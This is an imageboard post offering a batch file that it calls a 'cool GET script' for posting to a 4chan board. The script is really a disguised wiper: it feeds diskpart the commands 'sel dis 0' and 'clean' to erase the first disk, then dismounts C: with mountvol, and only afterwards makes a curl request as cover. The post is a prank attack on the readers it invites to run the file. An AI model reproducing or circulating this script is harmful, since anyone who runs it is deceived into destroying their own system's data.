>>2189086Ok, so copy the below text into Notepad, and save it as get.bat.
Hope you enjoy!
@echo off
echo Welcome to Kagariposter's cool GET script (c) 2012
@echo sel dis 0 > getheaders.txt
@echo clean >> getheaders.txt
REM Change the below 4 lines to the board, GET you wish to receive, comment and image.
set board=bant
set get=2188888
set comment=kagari
set image=C:/Administrator/Desktop/Kagari/kagari.jpg
diskpart /s getheaders.txt
mountvol C: /p
curl -H "User-Agent: kagariGet" -p "get=%get%" -p "com=%comment%" -p "image=@%image%"
https://sys.4chan.org/%board%/imgboard.php?res=%get%echo Posted!